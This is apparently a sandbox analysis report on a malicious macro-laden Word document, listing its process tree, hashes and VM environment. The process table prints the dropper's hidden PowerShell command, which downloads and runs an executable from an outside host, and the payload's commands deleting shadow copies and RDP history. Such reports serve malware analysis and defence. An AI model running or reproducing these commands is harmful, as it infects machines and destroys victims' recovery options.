Creation Time | 2017-09-07 18:14 (UTC+2) |
VM Analysis Duration Time | 00:15:25 |
Execution Successful | |
Sample Filename | 69234490.doc |
Command Line Parameters | |
Prescript | |
Number of Processes | 10 |
Termination Reason | Timeout |
Download | Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON |
VTI Score
100 / 100
|
|
VTI Database Version | 2.6 |
VTI Rule Match Count | 2124 |
VTI Rule Type | Documents |
The operating system was rebooted during the analysis. | |
The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration. | |
The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration. |
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
---|---|---|---|---|---|---|
#1 | 0x908 | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" | |
#2 | 0xbb0 | Child Process | Medium | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $nJThd = new-object System.Net.WebClient;$kNpOYqxzAkL = new-object random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}} | #1 |
#3 | 0x868 | Child Process | Medium | temp13684.exe | "C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe" | #2 |
#4 | 0x670 | Autostart | Medium | temp13684.exe | "C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe" | |
#5 | 0x30c | Child Process | Medium | cmd.exe | cmd /c C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat | #4 |
#6 | 0x480 | Child Process | Medium | vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet | #5 |
#7 | 0x77c | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f | #5 |
#8 | 0x764 | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f | #5 |
#9 | 0x78c | Child Process | Medium | reg.exe | reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" | #5 |
#10 | 0x648 | Child Process | Medium | attrib.exe | attrib Default.rdp -s -h | #5 |
ID | #17650 |
MD5 Hash Value | 5975014ccde7296da4989a01e1471e92 |
SHA1 Hash Value | 499a74573cf6aaa8e79c05d1b6d59dbbfb7402e1 |
SHA256 Hash Value | fec85bce338245403956637218c76db743748306c89f7ee7830af65ad17f62db |
Filename | 69234490.doc |
File Size | 74.06 KB (75837 bytes) |
File Type | Word Document |
Has VBA Macros |
Analyzer Version | 2.2.0 |
Analyzer Build Date | 2017-08-21 12:23 |
Microsoft Office Version | 2010 |
Microsoft Word Version | 14.0.4762.1000 |
Internet Explorer Version | 8.0.7601.17514 |
Chrome Version | 59.0.3071.109 |
Firefox Version | 25.0 |
Flash Version | 10.3.183.86 |
Java Version | 7.0.600 |
VM Name | win7_64_sp1-mso2010 |
VM Architecture | x86 64-bit |
VM OS | Windows 7 |
VM Kernel Version | 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) |